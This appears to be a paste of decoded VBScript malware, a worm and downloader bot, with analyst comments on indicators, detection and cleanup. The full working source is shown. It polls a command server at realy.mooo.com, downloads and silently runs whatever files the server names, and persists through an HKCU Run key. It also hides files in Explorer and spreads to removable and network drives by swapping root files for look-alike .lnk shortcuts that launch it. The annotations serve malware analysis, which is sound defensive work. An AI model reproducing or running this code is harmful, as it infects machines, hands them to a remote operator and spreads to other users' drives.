James_inthe_box

Decoded

Nov 8th, 2018
  ' Analyst notes: configuration, shared objects and the entry-point dispatch.
  ' The script runs in one of two modes, chosen by comparing its own file name
  ' (Wscript.ScriptName) with activ_name: the resident loop, or the first-run install.
  1. '<coded by Bl4cKs0cK>'
  ' Runtime errors are suppressed from here on; a failing step is silently skipped.
  2. On Error Resume Next
  3. Dim host
  ' Server host name polled by serv_cmd (network indicator). It is prefixed with
  ' "http://" further down, so the traffic is plain HTTP.
  4. host = "realy.mooo.com"
  5. Dim host_script
  ' Path on that host that receives the "?cmd=" requests.
  6. host_script = "bot/lancer/index.php"
  7. Dim activ_name
  ' File name of the resident copy kept in %temp% (file-system indicator).
  8. activ_name = "SysinfY2X.db"
  9. Dim passiv_name
  ' File name of the copy written to the root of other drives by infect_drives.
  10. passiv_name = "Manuel.doc"
  11. Dim sleep_time
  ' Value passed to wscript.sleep on each loop iteration.
  12. sleep_time = 2000
  13. Dim sleep_time_limit
  ' Default interval between server polls; divided by sleep_time below to give the
  ' number of loop iterations between polls (60000 / 2000 = 30).
  14. sleep_time_limit = 60000
  15. Dim http
  16. Set http = CreateObject("MSXML2.ServerXMLHTTP")
  17. Dim sh
  18. Set sh = WScript.CreateObject("WScript.Shell")
  19. Dim fs
  20. Set fs= CreateObject("Scripting.FileSystemObject")
  21. Dim WMIService
  ' Local WMI connection; used for the Win32_Process queries in infect_machin and kill_old.
  22. Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  23. Const adTypeBinary = 1
  24. Const adTypeText = 2
  25. Const adSaveCreateOverWrite = 2
  26. Const adSaveCreateNotExist = 1
  27. Dim stream_self
  ' Holds the script's own bytes; every copy written elsewhere comes from this stream.
  28. Set stream_self = CreateObject("Adodb.Stream")
  29. Dim script_name
  30. script_name = Wscript.ScriptName
  31. Dim tmp_dir
  32. tmp_dir = sh.ExpandEnvironmentStrings("%temp%") & "\"
  33. host = "http://" & host & "/"
  34. stream_self.Type = adTypeBinary
  35. stream_self.Open
  36. stream_self.LoadFromFile fs.GetFile(Wscript.ScriptFullName)
  37. Dim script_size
  ' Size of the running script. It is compared with on-disk copies to decide whether
  ' to rewrite them, and is sent to the server together with activ_name.
  38. script_size = stream_self.Size
  ' Resident mode: only when the script is running under the name activ_name.
  39. If (script_name = activ_name) Then
  40. Dim serv_rep, cont, cont_limit
  41. cont = 0
  42. cont_limit = CInt(sleep_time_limit / sleep_time)
  ' Endless loop. Each pass re-spreads to drives, rewrites the Run key, restores the
  ' %temp% copy and removes a differently named variant ("SysinfYhX.db").
  43. While True
  44. infect_drives
  45. infect_registre
  46. protect_del
  47. kill_old("SysinfYhX.db")
  48. If cont < cont_limit Then
  49. cont = cont + 1
  50. wscript.sleep sleep_time
  51. Else
  ' Poll cycle. serv_cmd returns "-1" when the HTTP status is not 200.
  52. cont = 0
  53. serv_rep = serv_cmd("ping")
  54. If serv_rep <> "-1" Then
  ' The "ping" reply is converted with CInt and becomes the new poll interval,
  ' so the server controls how often this host checks in.
  55. cont_limit = CInt(CInt(serv_rep) / sleep_time)
  ' Second request carries script_size followed by activ_name. A reply other than "0"
  ' is handed to get_new_v (replacement download); presumably a version check - the
  ' server side is not visible here.
  56. serv_rep = serv_cmd(script_size & activ_name)
  57. If serv_rep <> "-1" Then
  58. If serv_rep <> "0" Then
  59. get_new_v(serv_rep)
  60. Else
  ' No replacement offered: ask for the "list" and let get_list fetch and start each entry.
  61. serv_rep = serv_cmd("list")
  62. If serv_rep <> "-1" Then
  63. get_list(serv_rep)
  64. End If
  65. End If
  66. End If
  67. Else
  ' Server unreachable or non-200: fall back to the default poll interval.
  68. cont_limit = CInt(sleep_time_limit / sleep_time)
  69. End If
  70. End If
  71. Wend
  72. Else
  ' Any other file name (for example the drive copy passiv_name): install and exit.
  73. infect_machin
  74. End if
  ' serv_cmd(cmd): send one synchronous HTTP GET to host & host_script with cmd in the
  ' "cmd" query parameter. Returns the response text on status 200, otherwise "-1".
  ' Detection note: cmd is appended as-is (no URL encoding), so the request line
  ' contains "?cmd=ping", "?cmd=list", or "?cmd=" followed by the script size and activ_name.
  75. Function serv_cmd(cmd)
  76. On Error Resume Next
  77. Dim stat
  ' Third argument False = synchronous request.
  78. http.Open "GET", host & host_script & "?cmd=" & cmd , False
  79. http.Send
  80. stat = http.Status
  81. If stat <> 200 Then
  82. serv_cmd = "-1"
  83. Else
  84. serv_cmd=http.ResponseText
  85. End If
  86. End Function
  ' bot_up(arr): fetch a file described by a parsed server reply, store it under %temp%
  ' and start it. arr is the array built by get_split:
  '   arr(1) URL to fetch, arr(2) expected size, arr(3) file name under %temp%,
  '   arr(4) text placed after "start" on the launch command line.
  ' Returns True only when a download was made and saved. A file that already exists
  ' with a size equal to arr(2) is left in place and is not started.
  ' Detection note: all four values are server-controlled and are used unvalidated in a
  ' file path and a cmd.exe command line. The downloaded body itself is not checked;
  ' arr(2) is only compared with a file that is already present.
  87. Function bot_up(arr)
  88. On Error Resume Next
  89. Dim stat, frm_, size_, to_, lnc_
  90. frm_ = arr(1)
  91. size_ = arr(2)
  92. to_ = arr(3)
  93. lnc_ = arr(4)
  94. Dim stream
  95. Set stream = CreateObject("Adodb.Stream")
  96. stream.Type = adTypeBinary
  97. stream.Open
  98. If fs.FileExists (tmp_dir & to_) Then
  ' Existing file: replace it only when its size differs from the advertised size.
  99. If fs.GetFile(tmp_dir & to_).Size <> size_ Then
  100. http.Open "GET", frm_, False
  101. http.Send
  102. If http.Status <> 200 Then
  103. bot_up = False
  104. Else
  105. stream.Write http.ResponseBody
  ' Attributes are reset to hidden only (2) before the forced delete, then the new
  ' file is marked read-only + hidden + system (1+2+4).
  106. fs.GetFile(tmp_dir & to_).Attributes=2
  107. fs.DeleteFile tmp_dir & to_, True
  108. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  109. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
  110. bot_up = True
  111. End If
  112. Else
  113. bot_up = False
  114. End If
  115. Else
  ' No file of that name yet: download and save unconditionally.
  116. http.Open "GET", frm_, False
  117. http.Send
  118. If http.Status <> 200 Then
  119. bot_up = False
  120. Else
  121. stream.Write http.ResponseBody
  122. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  123. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
  124. bot_up = True
  125. End If
  126. End If
  127. stream.Close
  128. If bot_up Then
  ' Window style 0 = hidden. The child process appears as cmd.exe with
  ' "/c start <arr(4)> %temp%\<arr(3)>" on its command line.
  129. sh.Run "cmd /c start " & lnc_ & " %temp%\" & to_, 0
  130. End If
  131. End Function
  ' get_split(in_): parse one server reply entry into a five-element array.
  ' Fields are located by the literal markers <from>, <size>, <to> and <lancer>, each
  ' value ending at the next <br>. Result layout:
  '   ret(0) validity flag, ret(1) from, ret(2) size (CInt), ret(3) to, ret(4) lancer.
  ' ret(0) is set to False when any element equals "" or " ".
  ' NOTE(review): with On Error Resume Next a missing marker presumably leaves the
  ' default value in place rather than raising - confirm on a test host.
  ' Detection note: these markers in an HTTP response body from host_script are a
  ' usable network signature for this family.
  132. Function get_split(in_)
  133. On Error Resume Next
  134. Dim ret
  135. ret = Array(True, "", 0, "", "")
  136. ret(1) = Split(Split(in_, "<from>")(1), "<br>")(0)
  137. ret(2) = CInt(Split(Split(in_, "<size>")(1), "<br>")(0))
  138. ret(3) = Split(Split(in_, "<to>")(1), "<br>")(0)
  139. ret(4) = Split(Split(in_, "<lancer>")(1), "<br>")(0)
  140. For Each a In ret
  141. If a = "" Or a = " " Then
  142. ret(0) = False
  143. Exit For
  144. End If
  145. Next
  146. get_split = ret
  147. End Function
  ' get_new_v(req): handle a replacement offered by the server.
  ' The reply is parsed with get_split and fetched/started with bot_up. When that
  ' succeeds the running instance exits; if the new file name differs from the current
  ' script name it first removes its Run value (del_registre) and deletes its own file.
  ' Forensic note: after such a replacement the earlier file and Run value are gone,
  ' so the indicators on disk follow whatever name the server supplied in <to>.
  148. Function get_new_v(req)
  149. On Error Resume Next
  150. Dim data_
  151. data_ = get_split(req)
  152. If data_(0) Then
  153. If bot_up(data_) Then
  154. If data_(3) <> script_name Then
  155. del_registre
  156. fs.GetFile(Wscript.ScriptFullName).Attributes=2
  157. fs.DeleteFile Wscript.ScriptFullName, True
  158. End If
  159. wscript.quit
  160. End If
  161. End If
  162. End Function
  ' get_list(req): process the reply to the "list" request.
  ' A reply of "0" means nothing to do (returns False). Otherwise the reply is split on
  ' the literal marker <list>, each entry is parsed with get_split, and every valid
  ' entry is passed to bot_up, which downloads it to %temp% and starts it.
  ' Returns True whenever the reply was not "0", regardless of individual results.
  163. Function get_list(req)
  164. On Error Resume Next
  165. If req <> "0" Then
  166. Dim tbl
  167. tbl = Split(req, "<list>")
  168. For Each case_ In tbl
  169. Dim data_
  170. data_ = get_split(case_)
  171. If data_(0) Then
  172. bot_up(data_)
  173. End If
  174. Next
  175. get_list = True
  176. Else
  177. get_list = False
  178. End If
  179. End Function
  ' infect_machin: first-run install, reached when the script is not named activ_name.
  ' Steps: write the Run value (infect_registre), place a copy of itself at
  ' %temp%\<activ_name> when the file is missing or differs in size, mark it
  ' read-only + hidden + system, start that copy, then exit.
  ' Detection note: the launch is "cmd /c start wscript /e:VBScript.Encode <path>" with a
  ' hidden window, so wscript.exe is run against a file with a .db extension.
  180. Function infect_machin
  181. On Error Resume Next
  182. infect_registre
  183. If fs.FileExists (tmp_dir & activ_name) Then
  184. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  185. fs.GetFile(tmp_dir & activ_name).Attributes=2
  186. fs.DeleteFile tmp_dir & activ_name, True
  187. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
  188. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  189. infect_machin = True
  190. Else
  ' Copy already present with the same size: nothing written.
  191. infect_machin = False
  192. End If
  193. Else
  194. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  195. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  196. infect_machin = True
  197. End If
  198. If infect_machin Then
  ' Spaces in the path are replaced by a quoted space (ChrW(34) is the double quote)
  ' so the path survives the cmd.exe command line.
  199. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  200. Else
  ' Copy was already current: start it only if WMI shows no wscript.exe process whose
  ' command line contains activ_name.
  201. Dim colItms
  202. Set colItms = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & activ_name & "%'")
  203. If colItms.Count = 0 Then
  204. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  205. End If
  206. Set colItms = Nothing
  207. End If
  208. wscript.quit
  209. End Function
  ' infect_drives: spread to every ready drive other than the system drive whose
  ' FileSystemObject DriveType is 1 (removable), 3 (network) or 4 (CD-ROM).
  ' For each such drive it writes a copy of itself to the root as passiv_name, then
  ' replaces what the user sees in the root: every file and folder is marked
  ' hidden + system and a same-named .lnk is created that runs the copy first and then
  ' opens the original item.
  ' Recovery note: originals are only re-attributed (2+4), never deleted or moved, so
  ' clearing the hidden/system attributes restores them once the .lnk files and the
  ' passiv_name copy have been removed.
  ' Detection note: .lnk files in a drive root whose target is cmd.exe and whose
  ' arguments contain "wscript /e:VBScript.Encode" match this routine.
  210. Sub infect_drives
  211. On Error Resume Next
  212. Dim sys_drive
  213. sys_drive = sh.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
  214. For Each cle In fs.Drives
  215. If cle.isReady And (cle.DriveType = 1 Or cle.DriveType = 3 Or cle.DriveType = 4) Then
  216. Dim d
  217. d = cle.path
  218. If d <> sys_drive Then
  ' Write or refresh the root copy; size difference is the only staleness test, and
  ' free space is checked before writing.
  219. If fs.FileExists(d & "\" & passiv_name) Then
  220. If (fs.GetFile(d & "\" & passiv_name).Size <> script_size) And (cle.FreeSpace > Abs(fs.GetFile(d & "\" & passiv_name).Size - script_size)) Then
  221. fs.GetFile(d & "\" & passiv_name).Attributes=2
  222. fs.DeleteFile d & "\" & passiv_name, True
  223. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateOverWrite
  224. End If
  225. Else
  226. If cle.FreeSpace > script_size Then
  227. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateNotExist
  228. End If
  229. End If
  ' The copy is marked read-only + hidden + system.
  230. fs.GetFile(d & "\" & passiv_name).Attributes=1+2+4
  231. If cle.FreeSpace > 0 Then
  ' Files in the drive root.
  232. For Each f In fs.GetFolder(d & "\").Files
  233. Dim f_ext
  ' Lower-cased text after the last dot, or the placeholder "NULL" when there is no dot.
  234. If instr(f.name, ".") Then
  235. Dim f_name
  236. f_name = split(f.name, ".")
  237. f_ext = lcase( f_name(ubound(f_name)) )
  238. Else
  239. f_ext = "NULL"
  240. End if
  ' Skip shortcuts, the copy itself, and files whose attributes are already exactly 2+4.
  241. If f_ext <> "lnk" And f.name <> passiv_name And f.Attributes <> 2+4 Then
  242. f.Attributes = 2+4
  ' An existing shortcut of the same name has its attributes cleared so it can be rewritten.
  243. If fs.FileExists(d & "\" & f.name & ".lnk") Then
  244. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 0
  245. End If
  246. Dim shurt, s_icon
  247. Set shurt = sh.CreateShortcut(d & "\" & f.name & ".lnk")
  ' WindowStyle 7 = minimized; target is cmd.exe with an empty working directory.
  248. shurt.WindowStyle = 7
  249. shurt.TargetPath = "cmd.exe"
  250. shurt.WorkingDirectory = ""
  251. Dim f_arg
  ' Arguments: run the root copy through wscript, then "start" the original file.
  252. f_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start " & replace( f.name," ", ChrW(34) & " " & ChrW(34))
  253. shurt.Arguments = f_arg & " & exit"
  ' Icon is read from the registry class registered for the extension (DefaultIcon),
  ' so the shortcut looks like the file type it replaces; the file's own path is the fallback.
  254. s_icon = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & f_ext & "\") & "\DefaultIcon\")
  255. If ( instr(s_icon, ",") = 0 ) Or f_ext = "NULL" Then
  256. shurt.IconLocation = f.path
  257. Else
  258. shurt.IconLocation = s_icon
  259. End if
  260. shurt.Save()
  ' The shortcut is left read-only (1).
  261. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 1
  262. End if
  263. Next
  ' Sub-folders of the drive root: same treatment, opened afterwards with "start explorer".
  264. For Each ff In fs.GetFolder(d & "\").SubFolders
  265. If ff.Attributes <> 2+4 Then
  266. ff.Attributes = 2+4
  267. If fs.FileExists(d & "\" & ff.name & ".lnk") Then
  268. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 0
  269. End If
  270. Dim shurt_, s_icon_
  271. Set shurt_ = sh.CreateShortcut(d & "\" & ff.name & ".lnk")
  272. shurt_.WindowStyle = 7
  273. shurt_.TargetPath = "cmd.exe"
  274. shurt_.WorkingDirectory = ""
  275. Dim ff_arg
  276. ff_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start explorer " & replace( ff.name," ", ChrW(34) & " " & ChrW(34))
  277. shurt_.Arguments = ff_arg & " & exit"
  ' Folder shortcuts take the registered Folder icon, falling back to the folder path.
  278. s_icon_ = sh.regread("HKLM\SOFTWARE\Classes\Folder\DefaultIcon\")
  279. If instr(s_icon_, ",") = 0 Then
  280. shurt_.IconLocation = ff.path
  281. Else
  282. shurt_.IconLocation = s_icon_
  283. End if
  284. shurt_.save()
  285. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 1
  286. End If
  287. Next
  288. End If
  289. End If
  290. End If
  291. Next
  292. End Sub
  ' infect_registre: per-user persistence plus a visibility change in Explorer.
  ' Writes two HKCU values:
  '   ...\CurrentVersion\Run\<activ_name without extension> (REG_SZ) = command that starts
  '   %temp%\<activ_name> through wscript at logon;
  '   ...\Explorer\Advanced\Hidden (REG_DWORD) = 2, the setting under which Explorer
  '   does not show hidden files.
  ' The resident loop calls this on every pass, so both values are rewritten if removed
  ' while the process is still running; terminate the wscript.exe instance before cleanup.
  293. Sub infect_registre
  294. On Error Resume Next
  295. Dim target, reg_d
  ' The cmd.exe path is hard-coded to C:\WINDOWS\system32.
  296. target = "C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\" & activ_name
  297. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  298. sh.regwrite "HKCU" & reg_d, target, "REG_SZ"
  299. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  300. sh.regwrite "HKCU" & reg_d, 2, "REG_DWORD"
  301. End Sub
  ' del_registre: delete the HKCU Run value named after activ_name (extension removed).
  ' Called by get_new_v when the instance is being replaced under a different file name.
  ' The Explorer "Hidden" value written by infect_registre is not reverted here.
  302. Sub del_registre
  303. On Error Resume Next
  304. Dim reg_d
  305. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  306. sh.RegDelete "HKCU" & reg_d
  307. End Sub
  ' protect_del: keep the %temp% copy in place while the resident loop runs.
  ' If %temp%\<activ_name> is missing it is rewritten from stream_self; if it exists with
  ' a different size it is overwritten. The read-only + hidden + system attributes are
  ' re-applied on every call.
  ' Cleanup note: deleting the file while the wscript.exe instance is alive has no
  ' lasting effect, because this runs on every loop pass.
  308. Function protect_del
  309. On Error Resume Next
  310. If fs.FileExists (tmp_dir & activ_name) Then
  311. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  312. fs.GetFile(tmp_dir & activ_name).Attributes=2
  313. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
  314. End If
  315. Else
  316. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  317. End If
  318. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  319. End Function
  ' kill_old(old_name): remove an instance running under another file name.
  ' Terminates every wscript.exe process whose command line contains old_name, deletes
  ' the HKCU Run value named after old_name (extension removed) and deletes the file
  ' from %temp%. The only caller visible here passes "SysinfYhX.db", so that name and
  ' the Run value "SysinfYhX" are worth adding to hunts as indicators of a related variant.
  320. Function kill_old(old_name)
  321. On Error Resume Next
  322. Dim colItems, reg_d
  323. Set colItems = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & old_name & "%'")
  324. For Each objItem in colItems
  325. objItem.Terminate
  326. Next
  327. colItems = Nothing
  328. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(old_name, ".")(0)
  329. sh.RegDelete "HKCU" & reg_d
  330. fs.GetFile(tmp_dir & old_name).Attributes=2
  331. fs.DeleteFile tmp_dir & "\" & old_name, True
  332. End Function